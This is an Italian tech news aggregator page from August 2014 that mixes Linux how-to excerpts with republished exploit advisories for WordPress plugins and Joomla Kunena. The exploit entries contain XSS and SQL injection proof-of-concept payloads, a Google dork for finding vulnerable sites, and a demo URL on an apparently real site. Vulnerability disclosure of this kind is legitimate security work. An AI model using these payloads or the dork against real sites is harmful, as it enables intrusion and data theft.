Ubuntu: visualizzare gli asterischi mentre digitiamo le password

8 agosto 2014 - Fonte: http://www.lffl.org/
In questa guida vedremo come visualizzare gli asterischi mentre digitiamo le password da terminale in Ubuntu Linux e derivate.
Ubuntu asterischi mentre digitiamo le passwordDurante l'installazione di Ubuntu o una derivata ci verrà chiesto di creare un account con il quale inserire sia un'username e soprattutto la password che ci consentirà di poter operare nel sistema operativo. Difatti se...

Leggi il seguito »

Installare e far coesistere diverse versioni Java su Ubuntu Linux

8 agosto 2014 - Fonte: http://www.sefi.it

A volte può essere necessario installare due diverse versioni Java sulla stessa macchina ed il motivo sta nel fatto che può esserci una o più applicazioni che per funzionare correttamente richiede una specifica versione di JVM (Java Virtual Machine) che…

(Letto 11 volte di cui 11 negli ultimi 30gg)

L'articolo Installare e far coesistere diverse versioni Java su Ubuntu Linux sembra essere il primo su Linux, Open Source e ... altro.

...

Leggi il seguito »

WordPress WPSS 0.62 Cross Site Scripting

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...

Leggi il seguito »

WordPress WPSS 0.62 SQL Injection

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
...

Leggi il seguito »

Url rewrite su WordPress in locale

7 agosto 2014 - Fonte: http://www.red-blue.it

Su un sito WordPress in locale, possiamo scegliere di abilitare i cosiddetti permalink personalizzati (Impostazioni -> Permalink), ovvero presentare le url delle nostre pagine web in maniera più elegante, esattamente come avviene in un sito online.

Normalmente però Apache non ha abilitato di default il modulo di rewrite, per cui potremmo ottenere un errore 404 (Not found). Poco male, per ovviare basta abilitare l’url rewrite su WordPress in locale, andando nel file di configurazione (/etc/apache2/apache2.conf in Debian) e cercando la seguente sezione:

<Directory /var/www/>
 Options Indexes FollowSymLinks
 AllowOverride None
 Require all granted
</Directory>

E...

Leggi il seguito »

Cronache di fallimenti annunciati: gli apparenti autogol dei colossi informatici

6 agosto 2014 - Fonte: http://it.emcelettronica.com/taxonomy/term/378%201120%20384%20386%203%20391%201%201095/0
chiuso per fallimento

Nel mondo dell’informatica e dei Social Network sono sempre le idee migliori ad affermarsi? Il sospetto che pochi grandi colossi manovrino le sorti dei piccoli come burattinai che decidono quale filo tagliare è lecito se si guarda alla storia. Lo spunto di riflessione nasce dalla recente notizia dell’acquisizione di Whatsapp da parte di Facebook. Ma a ben vedere questa tattica ha radici ben più profonde: Microsoft ha costruito un intero monopolio su questa strategia...

Leggi il seguito »

La guida definitiva di Marco’s Box a UEFI

5 agosto 2014 - Fonte: http://www.marcosbox.org/search/label/Informatica
Quando su parla di UEFI si parla di nuovi PC e si parla di Windows 8, metafora per molti di "difficile metterci linux"


Falso, non è difficile ma solo diverso.

Prima di iniziare tantovale specificare un paio di cosette rassicuranti:
  • Linux, assieme a tutto il resto del mondo dei sistemi operativi a parte quelli della famiglia Windows supporta UEFI fin da quando questo standard è nato, cioè nel tardo 2002.

Joomla Kunena Forum 3.0.5 Cross Site Scripting

4 agosto 2014 - Fonte: http://www.mondounix.com
Kunena forum extension for Joomla multiple reflected cross-site scripting vulnerabilities
 
Class:      Input Validation Error
CVE      N/A
Remote      Yes
Local      No
Published    02/07/2014
 
Credit      Raymond Rizk of Dionach (vulns@dionach.com)
Vendor      Kunena
Vulnerable    Kunena v3.0.5
Solution Status:  Fixed by Vendor
 
Kunena Forum is prone to multiple reflected cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
 
Kunena...

Leggi il seguito »

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

4 agosto 2014 - Fonte: http://www.mondounix.com
###########################################################################################
# Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF
# Date: 28 de Julio del 2014
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/
# Tested on: Win7 & Linux Mint
# Affected Version : 2.0.2 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
 
Affected items - Archivos Afectados.
 
http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS
CODE]
 
Prueba de Concepto PoC:
Vector: "><svg/onload=alert(/Dylan/)>
 
Variable Afectada: $idx
Fix:...

Leggi il seguito »

WordPress Lead Octopus Power SQL Injection

2 agosto 2014 - Fonte: http://www.mondounix.com
##############
# Exploit Title : Wordpress Lead-Octopus-Power plugin SQL INJECTION
#
# Exploit Author : Ashiyane Digital Security Team
#
# vendor Home  : http://wordpress.org/
#
# Home : www.Ashiyane.org
#
# Security Risk : HIgh
#
# Dork : inurl:wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=
#
##############
#Location : wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL]
#
#
#Dem0:
# http://www.smurfsvillagesecrets.com/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=2
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############

(121)

...

Leggi il seguito »